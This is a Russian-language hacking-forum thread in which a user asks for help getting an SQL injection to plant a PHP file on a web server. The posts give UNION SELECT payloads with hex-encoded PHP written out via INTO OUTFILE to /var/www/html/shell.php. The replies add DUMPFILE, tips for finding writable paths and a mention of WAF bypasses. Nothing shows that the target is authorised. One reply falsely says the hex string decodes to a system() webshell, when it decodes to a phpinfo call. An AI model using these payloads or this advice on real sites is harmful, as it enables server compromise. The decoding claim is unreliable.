• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

В sql injection не запускается php script

farrukh

Member
13.06.2019
8
0
BIT
0
В sql injection не запускается php script (-12 union all select 1,0x3c3f70687020706870696e666f28293a3f3e,3,4,5-- -) (-12 union all select 1,<?php phpinfo();?>,3,4,5-- -).
Пользователь root@localhost, есть доступ к чтению и запись.
на странице не отображается результат, если посмотреть исходный код странице php код отображается с красным светом, как решит задачу.
вопрос.png

вопрос 2.png
 

noted

Green Team
08.12.2019
107
14
BIT
0
Для того чтобы он выполнился необходимо его в php файл записать. В Вашем payloade я не вижу функции into outfile или чего-то подобного
 

farrukh

Member
13.06.2019
8
0
BIT
0
-12+union+all+select+1,0x3c3f70687020706870696e666f28293b203f3e,3,4,5+INTO+OUTFILE+'/var/www/html/shell.php'-- -

выдает 404,но есть права на запись файла?

в чем может быть проблема?
 

noted

Green Team
08.12.2019
107
14
BIT
0
Ну слушай, выглядит запрос валидным. Можно попробовать dumpfile. Далее ток методом проб и ошибок, раз ерорки тебе не сыплются то сходу больше не могу сказать в чем дело еще (ведь в конце концов возможно просто ошибка в синтаксиса где то)
 

farrukh

Member
13.06.2019
8
0
BIT
0
Ну слушай, выглядит запрос валидным. Можно попробовать dumpfile. Далее ток методом проб и ошибок, раз ерорки тебе не сыплются то сходу больше не могу сказать в чем дело еще (ведь в конце концов возможно просто ошибка в синтаксиса где то)
Новерное нада еще проработать над ошибками, может проблема в синтаксисе, спасибо за ответ. Еще вопрос а можноли проверит на какие каталоги есть доступ mysql на запись? Как эго реализовать?
 

noted

Green Team
08.12.2019
107
14
BIT
0
Если что, строка "0x3c3f70687020706870696e666f28293b203f3e" это "<?php system($_GET['c']);?> и mysql сам переводит эту строку.
Для начала, лучше бы попробовать записать какой ниб текст в файл и посмотреть - работает ли вообще. Возможно путь будет какой ниб /var/www/html/название сайта. Вы пробовали вызвать ваш php? Он вообще создаётся и находится там где нужно?
А потом уже пробовать всевозможные обходы waf
 

farrukh

Member
13.06.2019
8
0
BIT
0
Если что, строка "0x3c3f70687020706870696e666f28293b203f3e" это "<?php system($_GET['c']);?> и mysql сам переводит эту строку.
Для начала, лучше бы попробовать записать какой ниб текст в файл и посмотреть - работает ли вообще. Возможно путь будет какой ниб /var/www/html/название сайта. Вы пробовали вызвать ваш php? Он вообще создаётся и находится там где нужно?
А потом уже пробовать всевозможные обходы waf
чтение файлов возможно, но создание файла не как потому что он и txt даже не создает
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!